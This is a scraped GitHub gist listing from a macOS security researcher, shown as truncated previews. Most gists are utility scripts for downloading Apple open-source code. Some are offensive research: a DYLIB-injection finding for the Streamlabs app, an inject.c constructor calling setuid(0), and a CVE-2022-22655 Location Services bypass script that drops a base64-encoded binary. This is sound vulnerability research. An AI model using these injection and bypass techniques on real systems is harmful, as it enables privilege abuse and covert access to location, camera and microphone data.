I hereby claim:
- I am theevilbit on github.
- I am theevilbit (https://keybase.io/theevilbit) on keybase.
- I have a public key whose fingerprint is F499 3DB9 AD64 BB7B 273C 2A41 A833 5B8E 6ACF DB3C
To claim this, I am signing this object:
Csaba Fitzl theevilbit
theevilbit
/ keybase.md
Created
September 18, 2018 07:22
theevilbit
/ download_apple_tarballs.sh
Last active
July 2, 2021 02:38
Download tarballs from https://opensource.apple.com/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l2 https://opensource.apple.com/tarballs | |
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" -l2 https://opensource.apple.com/ | |
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l3 https://opensource.apple.com/darwinbuild/ |
The Streamlabs macOS thick client does have hardened runtime enabled, but specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app, and possibly gain persistence on a machine, beyond that, as StreamLabs has access to the microphone and camera a user would gain access to that once exploited.
We can see the wrong permissions with running the codesign utility:
csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)
theevilbit
/ get_apple_oss.sh
Last active
April 25, 2022 04:32
Download All Apple OSS Tarballs from Github
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| : ' | |
| You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs: | |
| https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api | |
| https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token | |
| ' | |
| APPLE_OSS_DIR="all_apple_oss_archives" | |
| APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt" |
theevilbit
/ all_apple_oss_archives_20220208.txt
Created
February 9, 2022 08:06
Apple OSS Tarball links as of 2022.02.08.
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-178 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-176.100.1 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-176 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-174.0.1 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-172 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-168 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-163 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-158 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-153 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-149 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : <<-EOL | |
| MIT License | |
| Copyright (c) 2020 Joel Bruner (original: https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/) | |
| Copyright (c) 2023 Csaba Fitzl (updated for Python3 & Monterey+) | |
| Permission is hereby granted, free of charge, to any person obtaining a copy | |
| of this software and associated documentation files (the "Software"), to deal | |
| in the Software without restriction, including without limitation the rights |
theevilbit
/ inject.c
Last active
December 22, 2023 23:23
DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX deep dive
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <syslog.h> | |
| #include <stdlib.h> | |
| __attribute__((constructor)) | |
| static void customConstructor(int argc, const char **argv) | |
| { | |
| setuid(0); | |
| system("id"); | |
| printf("Hello from dylib!\n"); |
theevilbit
/ cve_2022_22655_mount_locationd.sh
Last active
December 22, 2023 23:24
CVE-2022-22655 - macOS Location Services Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| echo "++ Stopping locationd" | |
| sudo launchctl stop com.apple.locationd | |
| echo "++ Dropping swiftliverpool" | |
| echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| #ugly script bu works. Most of the time. You might need to rerun to get all pages. | |
| #need to open the pages before we can do --print-to-pdf or --dump-dom as otherwise it doesn't load them | |
| #doing PDFs as raw htmls look really ugly | |
| /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --incognito https://developer.apple.com/documentation/technotes/ | |
| sleep 10 | |
| /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --headless=new --incognito --dump-dom https://developer.apple.com/documentation/technotes/ > technotes.html | |
| cat technotes.html | grep -Eo "href=\"/documentation/technotes/tn[a-zA-Z0-9/-]*\"" | cut -d "\"" -f 2 | cut -d "/" -f 4 | sort -u > urls.txt |
OlderNewer